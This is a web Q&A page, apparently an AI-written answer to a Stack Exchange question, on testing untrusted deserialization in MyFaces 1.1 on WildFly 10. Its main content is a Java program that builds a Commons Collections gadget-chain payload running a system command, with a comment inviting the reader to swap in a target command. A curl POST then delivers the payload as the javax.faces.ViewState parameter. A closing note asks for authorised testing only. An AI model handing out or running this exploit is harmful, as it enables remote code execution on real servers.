You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

请求MyFaces 1.1在WildFly 10下不可信数据反序列化测试示例代码

Testing Untrusted Deserialization in MyFaces 1.1 on WildFly 10

Got it, let's break down how to test this deserialization vulnerability. MyFaces 1.1 stores view state as a serialized Java object encoded in Base64, so manipulating this value can trigger untrusted deserialization if gadget chains exist in the classpath. Below's a practical example to generate a malicious payload and test it.

Prerequisites

  • A WildFly 10 instance running a web app using MyFaces 1.1
  • The app's classpath includes a gadget chain library (e.g., Commons Collections 3.x, common with older MyFaces setups)
  • A Java dev environment with access to relevant libraries

Example Code to Generate Malicious View State

This example uses the Commons Collections 3.x gadget chain to create a payload that executes a system command, then encodes it to match MyFaces' Base64 view state format.

1. Malicious Payload Generator

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class MyFacesDeserializationTest {
    public static void main(String[] args) throws Exception {
        // Build transformer chain to execute a system command
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"touch /tmp/myfaces_exploit_success"}) // Replace with your target command
        };

        Transformer chainedTransformer = new ChainedTransformer(transformers);

        // Wrap in LazyMap (triggered when MyFaces processes the view state)
        Map<String, Object> baseMap = new HashMap<>();
        Map<String, Object> maliciousMap = LazyMap.decorate(baseMap, chainedTransformer);

        // Trigger the transformation logic (ensures the chain is initialized)
        maliciousMap.get("trigger");

        // Serialize the malicious object
        ByteArrayOutputStream byteOut = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(byteOut);
        objOut.writeObject(maliciousMap);
        objOut.close();

        // Encode to Base64 (matches MyFaces view state encoding)
        String maliciousViewState = Base64.getEncoder().encodeToString(byteOut.toByteArray());
        System.out.println("Generated Malicious View State:\n" + maliciousViewState);
    }
}

2. Submit the Payload to the Application

Once you have the Base64 payload, send it as the javax.faces.ViewState parameter in a POST request to any MyFaces-powered page. Use curl or a tool like Burp Suite for this:

curl -X POST http://your-wildfly-host:8080/your-app/faces/target-page.xhtml \
  -d "javax.faces.ViewState=YOUR_BASE64_PAYLOAD_HERE" \
  -d "form_submit_param=value" # Add other required form parameters

Key Notes

  • Gadget Chain Compatibility: If your target app doesn't use Commons Collections, adjust the payload to use another available chain (e.g., Java's TemplatesImpl if present).
  • WildFly 10 Classloader: Ensure the gadget library is part of the app's deployment (not just WildFly's core modules) so the payload can access the required classes.
  • Ethical Testing: Only run this against systems you own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.

内容的提问来源于stack exchange,提问作者user1374266

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.20 10:17:26